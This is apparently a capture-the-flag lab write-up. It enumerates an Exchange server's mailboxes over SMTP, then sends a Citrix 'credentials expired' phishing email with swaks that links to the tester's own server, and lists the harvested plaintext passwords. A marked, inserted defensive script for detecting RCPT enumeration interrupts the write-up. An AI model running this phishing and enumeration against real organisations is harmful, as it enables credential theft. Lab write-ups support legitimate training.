➜ Xen telnet exchange.htb.local 25
Trying 10.13.38.12...
Connected to exchange.htb.local.
Escape character is '^]'.
help
220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
HELO hi
250 Hello.
MAIL FROM: <hi@hello.com>
250 OK
RCPT TO: <someone@a.com>
250 OK
I'll use smtp-user-enum to enumerate users.
sudo apt install smtp-user-enum
➜ Xen smtp-user-enum -D humongousretail.com -U /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -t 10.13.38.12 -m 40 -M RCPT
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... RCPT
Worker Processes ......... 40
Usernames file ........... /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
Target count ............. 1
Username count ........... 8295455
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ humongousretail.com
######## Scan started at Sat Jan 20 11:02:22 2024 #########
10.13.38.12: sales@humongousretail.com exists
10.13.38.12: marketing@humongousretail.com exists
10.13.38.12: legal@humongousretail.com exists
I also tried with another wordlist and one more user.
➜ Xen smtp-user-enum -D humongousretail.com -U /usr/share/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt -t 10.13.38.12 -m 40 -M RCPT
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Mode ..................... RCPT
Worker Processes ......... 40
Usernames file ........... /usr/share/seclists/Usernames/Honeypot-Captures/multiplesources-users-fabian-fingerle.de.txt
Target count ............. 1
Username count ........... 26324
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ humongousretail.com
######## Scan started at Sat Jan 20 11:11:15 2024 #########
10.13.38.12: it@humongousretail.com exists
10.13.38.12: legal@humongousretail.com exists
10.13.38.12: marketing@humongousretail.com exists
10.13.38.12: sales@humongousretail.com exists
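Added example, not part of the original write-up: on the mail server's side, the RCPT sweep above appears as one client issuing many RCPT TO commands in a short time, most of them rejected. The sketch below flags that pattern and lists the mailboxes the server confirmed to that client; the log format, sample lines, thresholds and function names are assumptions made for illustration, not a real Exchange log schema.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in a hypothetical log format: time, client IP, verb, address, reply code.
SAMPLE_LOG = """\
2024-01-20T11:02:22 10.10.14.11 RCPT admin@humongousretail.com 550
2024-01-20T11:02:22 10.10.14.11 RCPT root@humongousretail.com 550
2024-01-20T11:02:23 10.10.14.11 RCPT sales@humongousretail.com 250
2024-01-20T11:02:23 10.10.14.11 RCPT test@humongousretail.com 550
2024-01-20T11:02:24 10.10.14.11 RCPT marketing@humongousretail.com 250
2024-01-20T11:02:24 10.10.14.11 RCPT guest@humongousretail.com 550
2024-01-20T11:02:25 10.10.14.11 RCPT legal@humongousretail.com 250
2024-01-20T11:05:10 192.0.2.25 RCPT sales@humongousretail.com 250
2024-01-20T11:40:02 192.0.2.25 RCPT it@humongousretail.com 250
"""

def parse(line):
    ts, ip, verb, addr, code = line.split()
    return datetime.fromisoformat(ts), ip, verb.upper(), addr.lower(), int(code)

def detect_rcpt_enum(log_text, window=timedelta(seconds=60), min_distinct=5, min_reject_ratio=0.5):
    """Map each enumerating client IP to the addresses the server confirmed to it."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            ts, ip, verb, addr, code = parse(line)
            if verb == "RCPT":
                per_ip[ip].append((ts, addr, code))
    alerts = {}
    for ip, events in per_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until it spans at most `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            win = events[start:end + 1]
            distinct = {addr for _, addr, _ in win}
            rejected = sum(1 for _, _, code in win if code >= 500)
            if len(distinct) >= min_distinct and rejected / len(win) >= min_reject_ratio:
                # Report every address this client got a 250 for: these are now known to it.
                alerts[ip] = sorted({a for _, a, c in events if c == 250})
                break
    return alerts

if __name__ == "__main__":
    for ip, confirmed in detect_rcpt_enum(SAMPLE_LOG).items():
        print(f"{ip}: RCPT enumeration suspected, confirmed mailboxes: {confirmed}")
```

The confirmed list is the set of addresses to watch for follow-on phishing. A server that answers 250 to every recipient gives this detector no rejections to count, so the rejection-ratio threshold needs tuning to how the server actually replies.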
I'll try to phish users for the Citrix login. I'll use swaks.
swaks --from it@humongousretail.com --to sales@humongousretail.com --header "citrix Credentials expired" --body "citrix http://10.10.14.11/" --server humongousretail.com
Someone clicked the link :)
I got more creds when using the swaks command again.
awardel: @M3m3ntoM0ri@
pmorgan: Summer1Summer!
jmendes: VivaBARC3L0N@!!!
Logged in
When clicking on the monitor on the left side, it downloads a .ica file, before I download Citrix 64 bit on my system. Let's download it.